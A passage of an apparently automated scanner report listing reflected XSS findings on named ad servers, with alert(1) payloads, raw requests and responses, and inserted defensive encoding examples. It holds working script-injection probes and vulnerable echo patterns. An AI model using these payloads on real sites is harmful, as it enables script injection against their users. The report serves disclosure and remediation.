var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30101077229_1316221794","http://ad.doubleclick.net/adj/q1.bosheralddbba4'-alert(1)-'e84b40c6dcb/news;net=q1;u=,q1-30101077229_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f033d'-alert(1)-'85ce176899a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7353
Date: Sat, 17 Sep 2011 01:09:54 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... <scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30223795082_1316221794","http://ad.doubleclick.net/adj/q1.bosherald/newsf033d'-alert(1)-'85ce176899a;net=q1;u=,q1-30223795082_1316221794,12298b058f07061,polit,;;cmw=owl;sz=728x90;net=q1;env=ifr;ord1=736181;contx=polit;dc=s;btg=;ord=354527464??","728","90",true);</scr'+'ipt> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48057'-alert(1)-'6d221538d81 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7327
Date: Sat, 17 Sep 2011 01:09:50 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cid='12298b058f07061';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i ...[SNIP]... guage="Javascript">CollectiveMedia.createAndAttachAd("q1-30113229668_1316221790","http://ad.doubleclick.net/adj/q1.bosherald/news;net=q1;u=,q1-30113229668_1316221790,12298b058f07061,none,;;cmw=nurl;sz=48057'-alert(1)-'6d221538d81;contx=none;dc=s;btg=?","48057'-alert(1)-'6d221538d81","",true);</scr'+'ipt> ...[SNIP]...
The value of the u request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72a06'%3balert(1)//5908bbe03b7 was submitted in the u parameter. This input was echoed as 72a06';alert(1)//5908bbe03b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
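The script-context findings above all have the same shape: a request parameter (sz, u, Z, s, a REST path segment) is concatenated into a single-quoted JavaScript string literal, and the scanner's two probe forms, x'-alert(1)-'y and x';alert(1)//y, are enough to leave the literal and execute. The following is an added example, not code from the report or from the scanned sites; the template var adSize = '...' and the names renderVulnerable, renderSafe, jsStringEncode, alertFires and valueSeen are illustrative assumptions. It reproduces both break-outs against the raw template, then shows the encoding that keeps the value inside the literal without changing it.

```javascript
// Added example: single-quoted JavaScript string context, vulnerable and
// hardened. Names and the template are illustrative, not the scanned code.

// Vulnerable: the raw parameter value is placed inside '...'.
function renderVulnerable(sz) {
  return "var adSize = '" + sz + "';";
}

// Encoder for the JavaScript string-literal context: every character outside
// [A-Za-z0-9] becomes \xHH (\uHHHH above U+00FF). The result can only be read
// back as string data: ' " \ ; / < > and line terminators never reach the
// parser as syntax, and "</script>" cannot appear to end the element.
function jsStringEncode(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, function (ch) {
    var code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + ("0" + code.toString(16)).slice(-2)
      : "\\u" + ("000" + code.toString(16)).slice(-4);
  });
}

// Hardened: same template, encoded value.
function renderSafe(sz) {
  return "var adSize = '" + jsStringEncode(sz) + "';";
}

// Run the generated script with a stubbed alert(). True means the payload
// executed, which is what the scanner's proof of concept demonstrates.
// A SyntaxError is treated as "did not execute".
function alertFires(script) {
  var fired = false;
  try {
    new Function("alert", script)(function () { fired = true; });
  } catch (e) {
    // the injection broke the script without running the payload
  }
  return fired;
}

// What the page ends up holding in adSize, to confirm that encoding changed
// only the representation in the literal, not the data.
function valueSeen(script) {
  return new Function("alert", script + "\nreturn adSize;")(function () {});
}

// The two payload shapes from the report, used here as sample input.
var PAYLOADS = [
  "df0e3'-alert(1)-'44b07b60aae",   // arithmetic break-out, no ';' needed
  "72a06';alert(1)//5908bbe03b7"    // statement break-out, '//' hides the tail
];
```

The first payload needs no statement terminator at all: 'df0e3' - alert(1) - '44b07b60aae' is a valid expression, so a filter that only strips semicolons does nothing. JSON.stringify is not a substitute for the encoder here either, because it leaves ', < and / untouched, so it neither protects a single-quoted literal nor prevents a literal </script> from ending the block. The remediation text above still applies: the better design is to keep user data out of script entirely, for example in a data- attribute that the script reads, and to encode only when that is impossible.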
The value of the Z request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 906f3'-alert(1)-'8a5c815ddd2 was submitted in the Z parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3e33'-alert(1)-'9eac11f134b was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 379d8<script>alert(1)</script>9352c1ee60b was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:04 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "2083767379d8<script>alert(1)</script>9352c1ee60b"
The value of the placementId request parameter is copied into an HTML comment. The payload cb6e8--><script>alert(1)</script>c9166046b4e was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "1500495cb6e8--><script>alert(1)</script>c9166046b4e" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 92fce--><script>alert(1)</script>3d86a354bdc was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-192fce--><script>alert(1)</script>3d86a354bdc" --> ...[SNIP]...
4.46. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.bluelithium.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b778"-alert(1)-"c081c9a4e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1&section=2475049&2b778"-alert(1)-"c081c9a4e0=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT
Pragma: no-cache
Content-Length: 4667
Age: 0
Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?2b778"-alert(1)-"c081c9a4e0=1&Z=1x1&s=2475049&_salt=2441704624";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array ...[SNIP]...
4.47. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.bluelithium.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 960fe"><script>alert(1)</script>af24f5e639e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=1x1&section=2475049&960fe"><script>alert(1)</script>af24f5e639e=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=951
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 17 Sep 2011 01:12:19 GMT
Pragma: no-cache
Content-Length: 4712
Age: 0
Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id= ...[SNIP]... <a href="http://ads.bluelithium.com/imageclick?960fe"><script>alert(1)</script>af24f5e639e=1&Z=1x1&s=2475049&_salt=983545231&t=2" target="_parent"> ...[SNIP]...
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 7b4c8<script>alert(1)</script>7900287ce39 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:49:31 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> ...[SNIP]... </script>
java.lang.NumberFormatException: For input string: "10397677b4c8<script>alert(1)</script>7900287ce39"
The value of the placementId request parameter is copied into an HTML comment. The payload 1c8c0--><script>alert(1)</script>d8f33500b41 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "14593081c8c0--><script>alert(1)</script>d8f33500b41" --> ...[SNIP]...
The value of the ps request parameter is copied into an HTML comment. The payload 4ea7c--><script>alert(1)</script>2eed884a416 was submitted in the ps parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-14ea7c--><script>alert(1)</script>2eed884a416" -->
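The findings above cover the three HTML contexts that are not script: plain text between tags (pid, and later the color_* and c1..c15 parameters), a double-quoted attribute value (the imageclick href), and an HTML comment that carries a Java NumberFormatException message (placementId, ps). The following is an added example, not code from the report or from the scanned sites; the templates, the example.invalid host and the names htmlEncode, renderText, renderAttr, renderComment, parseNumericId, containsScriptTag and commentClosedEarly are illustrative assumptions. One HTML encoder handles all three contexts, and the comment case also shows the root cause the exception message reveals: the parameter is copied into the response before it has been validated as a number.

```javascript
// Added example: text, attribute and comment contexts, each rendered raw and
// encoded, plus input validation for the numeric id parameters. Names and
// templates are illustrative, not the scanned applications' code.

// Entity-encode the characters that change meaning in text and in
// double- or single-quoted attribute values.
function htmlEncode(s) {
  var map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, function (ch) { return map[ch]; });
}

// Context 1: text between tags.
function renderText(v, encode) {
  return "<p>" + (encode ? htmlEncode(v) : v) + "</p>";
}

// Context 2: double-quoted attribute. A value that is part of a URL should be
// URL-encoded first and HTML-encoded second; the HTML layer is what stops the
// `"><script>` break-out seen in the report.
function renderAttr(v, encode) {
  return '<a href="http://example.invalid/imageclick?' + (encode ? htmlEncode(v) : v) + '=1">';
}

// Context 3: HTML comment. The probe's `-->` closes the comment early; once
// `>` is encoded, nothing in the data can close it. Better still is to not
// write exception text into the page at all.
function renderComment(v, encode) {
  return '<!-- java.lang.NumberFormatException: For input string: "' +
    (encode ? htmlEncode(v) : v) + '" -->';
}

// Root cause fix for the comment findings: check the shape of the id before
// using it, and never put the rejected value into the response.
function parseNumericId(raw) {
  if (typeof raw !== "string" || !/^-?\d{1,18}$/.test(raw)) {
    return { ok: false, error: "invalid id" };   // generic message, no echo
  }
  return { ok: true, value: Number(raw) };
}

// What the scanner's <script>alert(1)</script> probes test for: does a
// script start tag survive into the rendered fragment?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Comment-specific check: the first `-->` after `<!--` should be the one the
// template wrote, i.e. the last one in the fragment.
function commentClosedEarly(html) {
  var open = html.indexOf("<!--");
  return html.indexOf("-->", open + 4) !== html.lastIndexOf("-->");
}

// Probe values from the report, used here as sample input.
var TEXT_PROBE = "379d8<script>alert(1)</script>9352c1ee60b";
var ATTR_PROBE = '960fe"><script>alert(1)</script>af24f5e639e';
var COMMENT_PROBE = "1500495cb6e8--><script>alert(1)</script>c9166046b4e";
```

Two practical points follow from the comment findings. First, the exception text shows that Integer parsing happened after the value was already in the response, so validation alone (parseNumericId) removes the injection point without any encoding. Second, HTML-encoding the comment body is a defence in depth, not a reason to keep emitting stack traces or error messages to the client; those belong in a server-side log.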
The value of the ad_creative_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba94d'%3balert(1)//bdd52ed5568 was submitted in the ad_creative_id parameter. This input was echoed as ba94d';alert(1)//bdd52ed5568 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ad_referral_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bfe2'%3balert(1)//712e3a0ece8 was submitted in the ad_referral_url parameter. This input was echoed as 5bfe2';alert(1)//712e3a0ece8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the color_bg request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90c0f"><script>alert(1)</script>584e56fd634 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_bg request parameter is copied into the HTML document as plain text between tags. The payload 235f2<script>alert(1)</script>4125eaa7b51 was submitted in the color_bg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_border request parameter is copied into the HTML document as plain text between tags. The payload aa51b<script>alert(1)</script>c93f4630dc4 was submitted in the color_border parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_link request parameter is copied into the HTML document as plain text between tags. The payload 76dc4<script>alert(1)</script>e5a3998eb1c was submitted in the color_link parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_text_normal request parameter is copied into the HTML document as plain text between tags. The payload 86a95<script>alert(1)</script>6511ba6bdbc was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_text_normal request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3c7"><script>alert(1)</script>9ace1e3c9ad was submitted in the color_text_normal parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the color_text_title request parameter is copied into the HTML document as plain text between tags. The payload 835d5<script>alert(1)</script>6102431f71c was submitted in the color_text_title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the default_league request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 688d1'%3balert(1)//add2da0c4a4 was submitted in the default_league parameter. This input was echoed as 688d1';alert(1)//add2da0c4a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the default_team request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82a46'%3balert(1)//40d577401fd was submitted in the default_team parameter. This input was echoed as 82a46';alert(1)//40d577401fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload b2604<script>alert(1)</script>e25fa51e76a was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 7be4b<a>cfdf0815b78 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8df99<script>alert(1)</script>8a03bb991cc was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 00:55:06 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 41452<script>alert(1)</script>b5bc8226dea was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=741452<script>alert(1)</script>b5bc8226dea&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:02 GMT
Date: Sat, 17 Sep 2011 00:52:02 GMT
Content-Length: 1235
Connection: close
The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 66a83<script>alert(1)</script>803fdeef77b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 961ba<script>alert(1)</script>5ef4d07457b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=961ba<script>alert(1)</script>5ef4d07457b&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:09 GMT
Date: Sat, 17 Sep 2011 00:52:09 GMT
Content-Length: 1235
Connection: close
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3d1ac<script>alert(1)</script>969635bd65a was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=59648883d1ac<script>alert(1)</script>969635bd65a&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:03 GMT
Date: Sat, 17 Sep 2011 00:52:03 GMT
Content-Length: 1235
Connection: close
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload dcffa<script>alert(1)</script>16a4cf57524 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2dcffa<script>alert(1)</script>16a4cf57524&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:05 GMT
Date: Sat, 17 Sep 2011 00:52:05 GMT
Content-Length: 1235
Connection: close
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d68d4<script>alert(1)</script>a87e6bee52c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=d68d4<script>alert(1)</script>a87e6bee52c&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:06 GMT
Date: Sat, 17 Sep 2011 00:52:06 GMT
Content-Length: 1235
Connection: close
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload e7599<script>alert(1)</script>52183d27ea7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=e7599<script>alert(1)</script>52183d27ea7&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
